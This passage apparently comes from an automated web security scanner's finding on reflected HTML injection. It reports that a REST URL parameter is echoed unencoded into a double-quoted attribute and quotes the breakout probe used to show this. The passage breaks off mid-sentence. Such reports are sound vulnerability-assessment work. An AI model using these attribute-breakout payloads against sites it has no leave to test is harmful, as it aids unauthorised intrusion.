The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full